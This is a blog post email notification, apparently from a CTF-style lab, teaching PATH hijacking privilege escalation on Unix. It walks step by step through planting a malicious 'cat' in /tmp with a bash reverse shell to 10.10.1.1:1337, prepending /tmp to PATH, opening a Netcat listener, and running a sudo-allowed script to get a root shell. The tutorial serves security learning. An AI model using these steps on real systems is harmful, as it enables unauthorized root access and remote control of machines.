[New post] Simple path hijacking (Unix/Unix-like)

shakuganz posted: " Hi everyone! Today's post is on path injection. Let's get started. Identifying path injection vulnerability There are many ways that may lead to path injection vulnerability. However, this post will only focus on path injection vulnerability in " Respond to this post by replying above this line New post on Shakugan Simple path hijacking (Unix/Unix-like) by shakuganz Hi everyone! Today's post is on path injection. Let's get started. Identifying path injection vulnerability There are many ways that may lead to path injection vulnerability. However, this post will only focus on path injection vulnerability in bash scripts. Path injection vulnerability usually occurs if root users do not specify the full path of the file they would like to run. Let's see the example below: cmd$ sudo -l [sudo] password for soulx: User soulx may run the following commands on previse: (root) /home/soulx/vulscript.sh Inside vulscript.sh: #!/bin/bash cat /etc/shadow > /dev/null 2>&1 In this case, the cat file/command was not specified with the full path. As such we can inject another path to the $PATH environment and let a malicious cat file execute instead with root privilege. Creating a malicious file cmd$ nano /tmp/cat Add the code below to the malicious cat file: #!/bin/bash bash -i >& /dev/tcp/10.10.1.1/1337 0>&1 Remember to change the IP address to your own. After doing so, save the file. Make it executable After creating the file, we have to make sure it is executable by changing the permission. cmd$ chmod 777 /tmp/cat Modify $PATH environment As we created the malicious file in the /tmp directory, we will need to add it into the start of the $PATH so that /tmp directory will be searched 1st for cat file/command. cmd$ export PATH="/tmp:$PATH" Exploit! Set a listening servicing Before we exploit the vulnerable script, remember to set Netcat on your own system to listen at the port you have specified: ownsys_cmd$ nc -lvnp 1337 Exploit the vulnerable script We may now run the vulnerable script where our malicious cat file will be executed instead. cmd$ sudo /home/soulx/vulscript.sh Your listening Netcat should receive an incoming connection and giving you a root shell! I hope these tabs have been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. This post is ad-supported ​ shakuganz | August 11, 2021 at 4:33 pm | Categories: Uncategorized | URL: https://wp.me/p9KTg5-W9 Comment    See all comments    Like Unsubscribe to no longer receive posts from Shakugan. Change your email settings at Manage Subscriptions. Trouble clicking? Copy and paste this URL into your browser: http://shakuganz.com/2021/08/11/simple-path-hijacking-unix-unix-like/ Thanks for flying with WordPress.com